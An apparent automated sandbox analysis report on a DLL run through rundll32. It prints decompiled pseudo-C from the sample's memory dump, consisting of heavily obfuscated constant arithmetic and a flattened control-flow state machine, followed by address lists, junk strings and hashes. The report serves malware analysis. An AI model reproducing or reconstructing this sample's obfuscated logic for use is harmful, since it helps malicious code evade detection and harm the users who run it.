				_v296 = _v296 << 0xf;
				_v296 = _v296 ^ 0x1654878a;
				_v304 = 0x17a6;
				_v304 = _v304 >> 0xd;
				_v304 = _v304 >> 0x10;
				_v304 = _v304 ^ 0x39a777a9;
				_v304 = _v304 ^ 0x39a71383;
				_v312 = 0xc1c5;
				_v312 = _v312 << 4;
				_v312 = _v312 / _t900;
				_t901 = 0x24;
				_v312 = _v312 / _t901;
				_v312 = _v312 ^ 0x000020a2;
				_v128 = 0xa7c2;
				_v128 = _v128 | 0x73e84681;
				_v128 = _v128 ^ 0x73e882e0;
				_v108 = 0xedc0;
				_v108 = _v108 + 0xffff38f3;
				_v108 = _v108 ^ 0x00004e88;
				_v268 = 0x4cb2;
				_v268 = _v268 + 0xffff581a;
				_t902 = 5;
				_v268 = _v268 * 0x7f;
				_v268 = _v268 / _t902;
				_v268 = _v268 ^ 0x332a7d68;
				_v48 = 0x3775;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x00003c2f;
				_v332 = 0x2e5;
				_v332 = _v332 + 0x973e;
				_v332 = _v332 + 0x582d;
				_v332 = _v332 | 0x4e46aea0;
				_v332 = _v332 ^ 0x4e46f01a;
				_v92 = 0xecb2;
				_v92 = _v92 >> 0x10;
				_v92 = _v92 ^ 0x00005860;
				_v192 = 0x76ab;
				_t903 = 0x58;
				_v192 = _v192 / _t903;
				_v192 = _v192 + 0xffffedde;
				_v192 = _v192 ^ 0xfffff039;
				_v168 = 0x569e;
				_v168 = _v168 | 0x8ce6da82;
				_v168 = _v168 ^ 0x7e552d9e;
				_v168 = _v168 ^ 0xf2b39afb;
				_v200 = 0x850f;
				_v200 = _v200 >> 2;
				_v200 = _v200 + 0xffffcd47;
				_v200 = _v200 ^ 0xfffff22a;
				_v336 = 0x9261;
				_v336 = _v336 << 0x10;
				_v336 = _v336 ^ 0x556f5d5a;
				_v336 = _v336 | 0x84e7afbb;
				_v336 = _v336 ^ 0xc7efb11f;
				_v260 = 0x9df0;
				_v260 = _v260 ^ 0x6037a460;
				_t904 = 0x6e;
				_v260 = _v260 / _t904;
				_t905 = 0x5d;
				_v260 = _v260 / _t905;
				_v260 = _v260 ^ 0x00026a3e;
				_v184 = 0x2584;
				_v184 = _v184 | 0x91f1cbbd;
				_v184 = _v184 + 0xffff1018;
				_v184 = _v184 ^ 0x91f0cf67;
				_v152 = 0x8ca9;
				_t906 = 0x4a;
				_v152 = _v152 / _t906;
				_v152 = _v152 << 4;
				_v152 = _v152 ^ 0x00006513;
				_v84 = 0x77f3;
				_v84 = _v84 + 0xffff3db1;
				_v84 = _v84 ^ 0xffffc1c9;
				_v52 = 0x587;
				_v52 = _v52 | 0x675f08fe;
				_v52 = _v52 ^ 0x675f36dd;
				_v76 = 0xbba2;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00005deb;
				_v328 = 0xf0a5;
				_v328 = _v328 | 0xb0da4f33;
				_v328 = _v328 >> 2;
				_v328 = _v328 + 0x1048;
				_v328 = _v328 ^ 0x2c36fa11;
				_v36 = 0x2a74;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00007692;
				_v188 = 0x2f66;
				_v188 = _v188 ^ 0x45e45990;
				_t907 = 0x18;
				_v188 = _v188 * 0x59;
				_v188 = _v188 ^ 0x4c6d2c94;
				_v196 = 0xbe6b;
				_v196 = _v196 | 0xf46158a2;
				_v196 = _v196 >> 0xc;
				_v196 = _v196 ^ 0x000f6213;
				_v88 = 0x4547;
				_v88 = _v88 << 1;
				_v88 = _v88 ^ 0x0000e110;
				_v96 = 0xb81;
				_v96 = _v96 | 0xae38e917;
				_v96 = _v96 ^ 0xae38b032;
				_v256 = 0x7754;
				_v256 = _v256 + 0xfa4d;
				_v256 = _v256 | 0x1efef3a7;
				_v256 = _v256 * 0xd;
				_v256 = _v256 ^ 0x92ff6df5;
				_v228 = 0xfbcd;
				_v228 = _v228 | 0x05cff199;
				_v228 = _v228 + 0xcc2;
				_v228 = _v228 ^ 0x05d05a46;
				_v320 = 0x8c88;
				_v320 = _v320 + 0xc4c7;
				_v320 = _v320 ^ 0x8fac5d5e;
				_v320 = _v320 * 0x41;
				_v320 = _v320 ^ 0x7af02945;
				_v224 = 0xc0c1;
				_v224 = _v224 >> 0xe;
				_v224 = _v224 << 0xf;
				_v224 = _v224 ^ 0x0001d04a;
				_v132 = 0x9e59;
				_v132 = _v132 | 0x8ad22999;
				_v132 = _v132 ^ 0x8ad28a97;
				_v264 = 0xdddc;
				_v264 = _v264 | 0xc797c5af;
				_v264 = _v264 << 0xc;
				_v264 = _v264 + 0xffffdbb5;
				_v264 = _v264 ^ 0x7ddf8dbd;
				_v272 = 0xbb3;
				_v272 = _v272 + 0xffffc942;
				_v272 = _v272 + 0x6fc5;
				_v272 = _v272 / _t907;
				_v272 = _v272 ^ 0x00002501;
				_v204 = 0x93cc;
				_v204 = _v204 << 9;
				_v204 = _v204 * 0x25;
				_v204 = _v204 ^ 0x2ab896dd;
				_v212 = 0x2aa;
				_v212 = _v212 << 0xf;
				_v212 = _v212 + 0xea80;
				_v212 = _v212 ^ 0x0155e81e;
				_v140 = 0x154e;
				_t908 = 0x5c;
				_v140 = _v140 / _t908;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 ^ 0x000002fd;
				_v148 = 0xb2ba;
				_v148 = _v148 >> 8;
				_v148 = _v148 + 0xffffdc87;
				_v148 = _v148 ^ 0xffffeb86;
				_v156 = 0x2cda;
				_v156 = _v156 << 8;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x0016035f;
				_v232 = 0xbd1e;
				_t909 = 0x6e;
				_v232 = _v232 / _t909;
				_v232 = _v232 >> 6;
				_v232 = _v232 << 0xa;
				_v232 = _v232 ^ 0x00003d22;
				_t910 = _v28;
				while(1) {
					L1:
					_t876 = 0xefeb7d0;
					while(1) {
						_t923 = _t911 - _t876;
						if(_t923 <= 0) {
						}
						L3:
						if(_t923 == 0) {
							_t782 = E10009B08(_v280, _v104, _t817, _v112, _v120, _t817, _v288, _a36, _v24, _v296, _v304, _t817, _v312, _v128, _a8);
							_t919 = _t919 + 0x38;
							_v340 = _t782;
							__eflags = _t782;
							_t911 =  !=  ? 0x21341eb : 0x5c03e16;
							goto L15;
						} else {
							if(_t911 == 0x17e99f4) {
								E10008DF2(_v228, _t910, _v320, _v224, _v132);
								_t919 = _t919 + 0xc;
								goto L22;
							} else {
								if(_t911 == 0x21341eb) {
									__eflags = _t815;
									if(__eflags != 0) {
										_push(0x10001244);
										_push(_v48);
										_t800 = E1001BF25(_v108, _v268, __eflags);
										_t817 = _t800;
										_v344 = _t800;
									}
									_t794 = E10003391(_a20, _t817, _t817, _t817, _v332, _v92, _v176 | _v300 | _v60 | _v236 | _v100 | _v208 | _v44 | _v292 | _v144, _v340, _v192, _v168, _v200, _t817, _v336, _t817, _v260);
									_t910 = _t794;
									_t824 = _v184;
									E1001C5F7(_t824, _v152, _v84, _v52, _v344);
									_t919 = _t919 + 0x40;
									__eflags = _t794;
									if(__eflags == 0) {
										L22:
										_t911 = 0x3b577df8;
									} else {
										_push(_t824);
										_v28 = 1;
										_t799 = E100022E8(_v76, _t910,  &_v28, _t824, _v328, _v36);
										_t919 = _t919 + 0x14;
										_v28 = _t799;
										_t911 = 0x2b165a6b;
									}
									goto L14;
								} else {
									if(_t911 == 0x5c03e16) {
										E10008DF2(_v140, _v24, _v148, _v156, _v232);
									} else {
										if(_t911 == 0x6187cef) {
											__eflags = E10006AC1(_t910, _v252, __eflags) - _v308;
											_t911 =  ==  ? 0x121268fd : 0x17e99f4;
											goto L14;
										} else {
											if(_t911 != 0xe64d539) {
												L41:
												__eflags = _t911 - 0x18f37a27;
												if(__eflags != 0) {
													while(1) {
														_t923 = _t911 - _t876;
														if(_t923 <= 0) {
														}
														goto L24;
													}
													goto L3;
												}
											} else {
												_v20 = 0x200;
												_t806 = E100157E8(0x200);
												_t916 = _t806;
												_t833 = 0x200;
												if(_t806 != 0) {
													_t834 = _v324;
													_t808 = E10007B20(_t834, _t916, _t833, _v244,  &_v20);
													_t921 = _t919 + 0xc;
													if(_t808 == 0) {
														_push(_v160);
														_push(_t834);
														_t810 = E1001CDCC(_v276, _v124, _v40, _v116, _t834, _t916);
														_t921 = _t921 + 0x18;
														_v32 = _t810;
													}
													E100091CD(_v216, _v136, _v316, _t916, _v68);
													_t919 = _t921 + 0xc;
												}
												_t911 = 0x26e9ad1b;
												L14:
												_t782 = _v340;
												L15:
												_t817 = _v344;
												goto L1;
											}
										}
									}
								}
							}
						}
						L44:
						return _t917;
						L24:
						__eflags = _t911 - 0x121268fd;
						if(_t911 == 0x121268fd) {
							__eflags = E1001676B(_t910, _a28);
							_t911 = 0x17e99f4;
							_t776 = 1;
							_t917 =  !=  ? _t776 : _t917;
							goto L40;
						} else {
							__eflags = _t911 - 0x26e9ad1b;
							if(_t911 == 0x26e9ad1b) {
								_push(_t817);
								_t779 = E100089C3(_v32, _t876, _v72, _v240, _v80, _v180, _t817, _v248);
								__eflags = _t779;
								_v24 = _t779;
								_t911 =  !=  ? 0xefeb7d0 : 0x18f37a27;
								E100091CD(_v56, _v164, _v172, _v32, _v64);
								_t919 = _t919 + 0x28;
								L40:
								_t817 = _v344;
								_t876 = 0xefeb7d0;
								goto L41;
							} else {
								__eflags = _t911 - 0x2a775466;
								if(__eflags == 0) {
									_t911 = 0xe64d539;
									continue;
								} else {
									__eflags = _t911 - 0x2b165a6b;
									if(_t911 == 0x2b165a6b) {
										__eflags = _t815;
										if(_t815 == 0) {
											_t811 = 0;
											__eflags = 0;
										} else {
											_t811 =  *((intOrPtr*)(_t815 + 4));
										}
										__eflags = _t815;
										if(_t815 == 0) {
											_t879 = 0;
											__eflags = 0;
										} else {
											_t879 =  *_t815;
										}
										_push(_t817);
										E10007D55(_v188, _t879, _a40, _v196, _v88, _t910, _t811, _v96, _v256);
										_t919 = _t919 + 0x20;
										asm("sbb esi, esi");
										_t911 = (_t911 & 0x0499e2fb) + 0x17e99f4;
										goto L14;
									} else {
										__eflags = _t911 - 0x3b577df8;
										if(_t911 != 0x3b577df8) {
											goto L41;
										} else {
											E10008DF2(_v264, _t782, _v272, _v204, _v212);
											_t919 = _t919 + 0xc;
											_t911 = 0x5c03e16;
											goto L14;
										}
									}
								}
							}
						}
						goto L44;
					}
				}
			}

0x1000addc
0x1000ade6
0x1000adf0
0x1000adf1
0x1000adf8
0x1000adff
0x1000ae00
0x1000ae07
0x1000ae0e
0x1000ae15
0x1000ae1c
0x1000ae23
0x1000ae24
0x1000ae25
0x1000ae2a
0x1000ae37
0x1000ae3e
0x1000ae40
0x1000ae47
0x1000ae49
0x1000ae54
0x1000ae57
0x1000ae64
0x1000ae6f
0x1000ae74
0x1000ae85
0x1000ae88
0x1000ae8c
0x1000ae93
0x1000ae9e
0x1000aea6
0x1000aeae
0x1000aeb6
0x1000aebe
0x1000aec6
0x1000aecb
0x1000aed3
0x1000aedb
0x1000aee6
0x1000aef1
0x1000aef9
0x1000af04
0x1000af0c
0x1000af1c
0x1000af20
0x1000af28
0x1000af30
0x1000af3b
0x1000af46
0x1000af51
0x1000af5c
0x1000af67
0x1000af72
0x1000af7d
0x1000af8f
0x1000af92
0x1000af99
0x1000afa4
0x1000afac
0x1000afb4
0x1000afb9
0x1000afc1
0x1000afc9
0x1000afd4
0x1000afdf
0x1000afea
0x1000aff4
0x1000b003
0x1000b006
0x1000b00a
0x1000b012
0x1000b01a
0x1000b025
0x1000b03b
0x1000b042
0x1000b04d
0x1000b055
0x1000b05d
0x1000b06a
0x1000b06d
0x1000b071
0x1000b079
0x1000b084
0x1000b08f
0x1000b09a
0x1000b0a2
0x1000b0aa
0x1000b0b2
0x1000b0ba
0x1000b0c2
0x1000b0cd
0x1000b0d8
0x1000b0e0
0x1000b0eb
0x1000b0fb
0x1000b0ff
0x1000b107
0x1000b10f
0x1000b117
0x1000b123
0x1000b128
0x1000b12e
0x1000b136
0x1000b13e
0x1000b146
0x1000b14e
0x1000b158
0x1000b159
0x1000b15d
0x1000b165
0x1000b16d
0x1000b181
0x1000b188
0x1000b193
0x1000b19e
0x1000b1a9
0x1000b1b4
0x1000b1bf
0x1000b1ca
0x1000b1d5
0x1000b1e0
0x1000b1eb
0x1000b1f6
0x1000b201
0x1000b20c
0x1000b217
0x1000b222
0x1000b22d
0x1000b237
0x1000b23f
0x1000b244
0x1000b249
0x1000b251
0x1000b25c
0x1000b267
0x1000b272
0x1000b27d
0x1000b288
0x1000b293
0x1000b29b
0x1000b2a0
0x1000b2a8
0x1000b2b0
0x1000b2b8
0x1000b2c3
0x1000b2ce
0x1000b2d9
0x1000b2e4
0x1000b2ef
0x1000b2fa
0x1000b305
0x1000b310
0x1000b318
0x1000b323
0x1000b32e
0x1000b336
0x1000b341
0x1000b34c
0x1000b357
0x1000b36b
0x1000b370
0x1000b379
0x1000b384
0x1000b38f
0x1000b397
0x1000b3a2
0x1000b3aa
0x1000b3b2
0x1000b3bf
0x1000b3c2
0x1000b3c6
0x1000b3ce
0x1000b3d9
0x1000b3e1
0x1000b3ec
0x1000b3f7
0x1000b3ff
0x1000b40a
0x1000b412
0x1000b41a
0x1000b422
0x1000b427
0x1000b42f
0x1000b43c
0x1000b446
0x1000b447
0x1000b44b
0x1000b450
0x1000b458
0x1000b460
0x1000b465
0x1000b46a
0x1000b472
0x1000b47a
0x1000b482
0x1000b491
0x1000b49b
0x1000b4a0
0x1000b4a6
0x1000b4ae
0x1000b4b9
0x1000b4c4
0x1000b4cf
0x1000b4da
0x1000b4e5
0x1000b4f0
0x1000b4f8
0x1000b505
0x1000b508
0x1000b514
0x1000b518
0x1000b520
0x1000b52b
0x1000b533
0x1000b53e
0x1000b546
0x1000b54e
0x1000b556
0x1000b55e
0x1000b566
0x1000b571
0x1000b579
0x1000b584
0x1000b596
0x1000b59b
0x1000b5a4
0x1000b5af
0x1000b5ba
0x1000b5c5
0x1000b5d0
0x1000b5db
0x1000b5e6
0x1000b5f1
0x1000b5f9
0x1000b604
0x1000b60f
0x1000b617
0x1000b61c
0x1000b624
0x1000b62c
0x1000b634
0x1000b63c
0x1000b648
0x1000b64d
0x1000b657
0x1000b65a
0x1000b65e
0x1000b666
0x1000b671
0x1000b67c
0x1000b687
0x1000b694
0x1000b6a8
0x1000b6ad
0x1000b6b6
0x1000b6be
0x1000b6c9
0x1000b6d4
0x1000b6df
0x1000b6ea
0x1000b6f5
0x1000b700
0x1000b70b
0x1000b716
0x1000b71e
0x1000b729
0x1000b731
0x1000b739
0x1000b73e
0x1000b746
0x1000b74e
0x1000b759
0x1000b761
0x1000b76c
0x1000b777
0x1000b78a
0x1000b78b
0x1000b792
0x1000b79d
0x1000b7a8
0x1000b7b3
0x1000b7bb
0x1000b7c6
0x1000b7d1
0x1000b7d8
0x1000b7e3
0x1000b7ee
0x1000b7f9
0x1000b804
0x1000b80c
0x1000b814
0x1000b821
0x1000b825
0x1000b82d
0x1000b838
0x1000b843
0x1000b84e
0x1000b859
0x1000b861
0x1000b869
0x1000b876
0x1000b87a
0x1000b882
0x1000b88d
0x1000b895
0x1000b89d
0x1000b8a8
0x1000b8b3
0x1000b8be
0x1000b8c9
0x1000b8d1
0x1000b8d9
0x1000b8de
0x1000b8e6
0x1000b8ee
0x1000b8f6
0x1000b8fe
0x1000b90c
0x1000b910
0x1000b918
0x1000b923
0x1000b933
0x1000b93a
0x1000b945
0x1000b952
0x1000b95a
0x1000b965
0x1000b970
0x1000b984
0x1000b989
0x1000b992
0x1000b99a
0x1000b9a5
0x1000b9b0
0x1000b9b8
0x1000b9c3
0x1000b9ce
0x1000b9d9
0x1000b9e1
0x1000b9e8
0x1000b9f3
0x1000ba05
0x1000ba08
0x1000ba0f
0x1000ba17
0x1000ba1f
0x1000ba2a
0x1000ba35
0x1000ba35
0x1000ba35
0x1000ba3a
0x1000ba3a
0x1000ba3c
0x1000ba3c
0x1000ba42
0x1000ba42
0x1000bcd2
0x1000bcd7
0x1000bcda
0x1000bcde
0x1000bcea
0x00000000
0x1000ba48
0x1000ba4e
0x1000bc75
0x1000bc7a
0x00000000
0x1000ba54
0x1000ba5b
0x1000bb4e
0x1000bb50
0x1000bb52
0x1000bb57
0x1000bb69
0x1000bb70
0x1000bb72
0x1000bb72
0x1000bbe6
0x1000bbef
0x1000bc06
0x1000bc0d
0x1000bc12
0x1000bc15
0x1000bc17
0x1000bc7d
0x1000bc7d
0x1000bc19
0x1000bc19
0x1000bc2a
0x1000bc41
0x1000bc46
0x1000bc49
0x1000bc50
0x1000bc50
0x00000000
0x1000ba61
0x1000ba67
0x1000be83
0x1000ba6d
0x1000ba73
0x1000bb42
0x1000bb49
0x00000000
0x1000ba79
0x1000ba7f
0x1000be4f
0x1000be4f
0x1000be55
0x1000ba3a
0x1000ba3a
0x1000ba3c
0x1000ba3c
0x00000000
0x1000ba3c
0x00000000
0x1000ba3a
0x1000ba85
0x1000ba96
0x1000ba9d
0x1000baa2
0x1000baa4
0x1000baa7
0x1000bab8
0x1000babc
0x1000bac1
0x1000bac6
0x1000bac8
0x1000bacf
0x1000baeb
0x1000baf0
0x1000baf3
0x1000baf3
0x1000bb14
0x1000bb19
0x1000bb19
0x1000bb1c
0x1000bb21
0x1000bb21
0x1000bb25
0x1000bb25
0x00000000
0x1000bb25
0x1000ba7f
0x1000ba73
0x1000ba67
0x1000ba5b
0x1000ba4e
0x1000be8d
0x1000be97
0x1000bcf2
0x1000bcf2
0x1000bcf8
0x1000be39
0x1000be3b
0x1000be42
0x1000be43
0x00000000
0x1000bcfe
0x1000bcfe
0x1000bd04
0x1000bdba
0x1000bde3
0x1000bdef
0x1000bdf1
0x1000be17
0x1000be21
0x1000be26
0x1000be46
0x1000be46
0x1000be4a
0x00000000
0x1000bd0a
0x1000bd0a
0x1000bd10
0x1000bdb0
0x00000000
0x1000bd16
0x1000bd16
0x1000bd1c
0x1000bd54
0x1000bd56
0x1000bd5d
0x1000bd5d
0x1000bd58
0x1000bd58
0x1000bd58
0x1000bd5f
0x1000bd61
0x1000bd67
0x1000bd67
0x1000bd63
0x1000bd63
0x1000bd63
0x1000bd69
0x1000bd93
0x1000bd98
0x1000bd9d
0x1000bda5
0x00000000
0x1000bd1e
0x1000bd1e
0x1000bd24
0x00000000
0x1000bd2a
0x1000bd42
0x1000bd47
0x1000bd4a
0x00000000
0x1000bd4a
0x1000bd24
0x1000bd1c
0x1000bd10
0x1000bd04
0x00000000
0x1000bcf8
0x1000ba3a

Strings

Vm, xrefs: 1000B357
:Z, xrefs: 1000B2C3
M, xrefs: 1000AFEA
f/, xrefs: 1000B76C
], xrefs: 1000B71E
t*, xrefs: 1000B74E
-X, xrefs: 1000B54E
h}*3, xrefs: 1000B518
/<, xrefs: 1000B533
t", xrefs: 1000B384
-, xrefs: 1000B20C
}9, xrefs: 1000B0E0
#S, xrefs: 1000B427
"=, xrefs: 1000BA1F
fTw*, xrefs: 1000BD0A
fTw*, xrefs: 1000AE6F
FT, xrefs: 1000B13E
oH, xrefs: 1000B0AA
E, xrefs: 1000AE64
GE, xrefs: 1000B7C6
gO, xrefs: 1000AF20
[, xrefs: 1000B19E
Z]oU, xrefs: 1000B61C
Tw, xrefs: 1000B804
JF, xrefs: 1000B188

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "=$#S$-$-X$/<$:Z$E$FT$GE$JF$M$Tw$Vm$Z]oU$f/$fTw*$fTw*$gO$h}*3$oH$t"$t*$}9$[$]
API String ID: 0-299718466
Opcode ID: 096944ea9d644cbed8a91504d9663a7921678804b23d5a58477bd81ded31b560
Instruction ID: bcb940ab0b51ba9aa32f5f7e717e54d56ca378d12b6cd42c33ee8c0488dd72e2
Opcode Fuzzy Hash: 096944ea9d644cbed8a91504d9663a7921678804b23d5a58477bd81ded31b560
Instruction Fuzzy Hash: 4882FF715087808BE3B4CF25C98AB9FBBE1FBC4354F108A1DE6D9962A0D7B58945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10019DC0, Relevance: 30.8, Strings: 24, Instructions: 774
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E10019DC0(void* __ecx, void* __edx) {
				void* __edi;
				void* _t760;
				intOrPtr _t823;
				void* _t831;
				signed int _t881;
				short _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				intOrPtr _t902;
				void* _t906;
				signed int _t909;
				signed int _t914;
				signed int _t926;
				signed int _t928;
				signed int _t930;
				short* _t998;
				short* _t999;
				intOrPtr _t1002;
				signed int _t1006;
				short _t1008;
				intOrPtr _t1010;
				void* _t1011;
				void* _t1012;
				void* _t1015;
				void* _t1016;

				_push( *((intOrPtr*)(_t1011 + 0xc9c)));
				_t997 =  *((intOrPtr*)(_t1011 + 0xc94));
				_push( *((intOrPtr*)(_t1011 + 0xc94)));
				_push( *((intOrPtr*)(_t1011 + 0xc9c)));
				_push( *((intOrPtr*)(_t1011 + 0xc94)));
				_push(__edx);
				_push(__ecx);
				E100056B2(_t760);
				 *(_t1011 + 0x114) = 0x5191;
				_t1008 = 0;
				_t1012 = _t1011 + 0x18;
				 *((intOrPtr*)(_t1012 + 0x150)) = 0;
				_t906 = 0x2a5de1a5;
				 *(_t1012 + 0xfc) =  *(_t1011 + 0x114) * 0x56;
				 *(_t1012 + 0xfc) =  *(_t1012 + 0xfc) ^ 0x001b362a;
				 *(_t1012 + 0xf4) = 0x7b48;
				 *(_t1012 + 0xf4) =  *(_t1012 + 0xf4) + 0xfffffae2;
				 *(_t1012 + 0xf4) =  *(_t1012 + 0xf4) ^ 0x0000048e;
				 *(_t1012 + 0x1c) = 0xfb4b;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) >> 0xf;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) + 0xd610;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) | 0xf3105de5;
				 *(_t1012 + 0x1c) =  *(_t1012 + 0x1c) ^ 0xf310f378;
				 *(_t1012 + 0x18) = 0x9b1e;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) >> 8;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) ^ 0xb792a5e4;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) | 0xa0a9b449;
				 *(_t1012 + 0x18) =  *(_t1012 + 0x18) ^ 0xb7bbf9a0;
				 *(_t1012 + 0x148) = 0x8759;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) + 0xffffcbd8;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) ^ 0x0000703f;
				 *(_t1012 + 0x24) = 0x14b0;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) * 0x38;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) | 0xd4c47a9c;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) + 0xffff1c59;
				 *(_t1012 + 0x24) =  *(_t1012 + 0x24) ^ 0xd4c44860;
				 *(_t1012 + 0xb0) = 0x6232;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) ^ 0xdc31e630;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) >> 1;
				 *(_t1012 + 0xb0) =  *(_t1012 + 0xb0) ^ 0x6e1897ce;
				 *(_t1012 + 0x2c) = 0x7298;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) + 0x69dd;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) | 0x6390fda1;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0xdd2d2ef6;
				 *(_t1012 + 0x2c) =  *(_t1012 + 0x2c) ^ 0xbebdb0ec;
				 *(_t1012 + 0xc0) = 0x228e;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) ^ 0x1a8b5cf2;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) * 0xc;
				 *(_t1012 + 0xc0) =  *(_t1012 + 0xc0) ^ 0x3e89f3bf;
				 *(_t1012 + 0x84) = 0x762e;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) * 0x59;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) | 0x558f0020;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) >> 6;
				 *(_t1012 + 0x84) =  *(_t1012 + 0x84) ^ 0x0156e9fd;
				 *(_t1012 + 0x114) = 0x835d;
				 *(_t1012 + 0x114) =  *(_t1012 + 0x114) << 1;
				 *(_t1012 + 0x114) =  *(_t1012 + 0x114) ^ 0x00012854;
				 *(_t1012 + 0x7c) = 0x96c1;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) << 4;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) + 0xffff53be;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) | 0xfd5d0ed6;
				 *(_t1012 + 0x7c) =  *(_t1012 + 0x7c) ^ 0xfd5dc139;
				 *(_t1012 + 0x74) = 0xffcb;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) >> 4;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) + 0xa69f;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) | 0x535a1459;
				 *(_t1012 + 0x74) =  *(_t1012 + 0x74) ^ 0x535ae4d6;
				 *(_t1012 + 0xc4) = 0xe3;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) + 0xffffd99b;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) * 0x50;
				 *(_t1012 + 0xc4) =  *(_t1012 + 0xc4) ^ 0xfff472d0;
				 *(_t1012 + 0x88) = 0xbaa6;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) ^ 0xbd6a9f93;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) << 7;
				 *(_t1012 + 0x88) =  *(_t1012 + 0x88) ^ 0xb512a337;
				 *(_t1012 + 0xb4) = 0x3531;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) << 6;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) >> 0xe;
				 *(_t1012 + 0xb4) =  *(_t1012 + 0xb4) ^ 0x000012d0;
				 *(_t1012 + 0xa8) = 0xe66d;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) ^ 0x1985e749;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) << 0x10;
				 *(_t1012 + 0xa8) =  *(_t1012 + 0xa8) ^ 0x01240ff4;
				 *(_t1012 + 0x68) = 0xdadb;
				_t884 = 0x72;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x68) / _t884;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 5;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) << 0xd;
				 *(_t1012 + 0x6c) =  *(_t1012 + 0x6c) ^ 0x07ac09df;
				 *(_t1012 + 0x11c) = 0xa461;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) + 0xffffc6b7;
				 *(_t1012 + 0x11c) =  *(_t1012 + 0x11c) ^ 0x0000386c;
				 *(_t1012 + 0x138) = 0xbe4d;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) + 0xffffcdbc;
				 *(_t1012 + 0x138) =  *(_t1012 + 0x138) ^ 0x000091a9;
				 *(_t1012 + 0x98) = 0x5b34;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x9869eb0c;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) + 0xffff7c43;
				 *(_t1012 + 0x98) =  *(_t1012 + 0x98) ^ 0x98694e20;
				 *(_t1012 + 0x90) = 0xb3cb;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) + 0xffff6388;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x2c5ba937;
				 *(_t1012 + 0x90) =  *(_t1012 + 0x90) ^ 0x2c5bd4ce;
				 *(_t1012 + 0x48) = 0x52c0;
				_t885 = 0x62;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) / _t885;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) + 0xffff9124;
				_t886 = 0x2b;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) * 0x41;
				 *(_t1012 + 0x48) =  *(_t1012 + 0x48) ^ 0xffe43930;
				 *(_t1012 + 0x40) = 0xac8b;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) << 0xd;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) >> 3;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) + 0xa7db;
				 *(_t1012 + 0x40) =  *(_t1012 + 0x40) ^ 0x02b29829;
				 *(_t1012 + 0x148) = 0x643b;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) / _t886;
				 *(_t1012 + 0x148) =  *(_t1012 + 0x148) ^ 0x000010f3;
				 *(_t1012 + 0x128) = 0xa997;
				 *(_t1012 + 0x128) =  *(_t1012 + 0x128) << 0xa;
				 *(_t1012 + 0x128) =  *(_t1012 + 0x128) ^ 0x02a66a03;
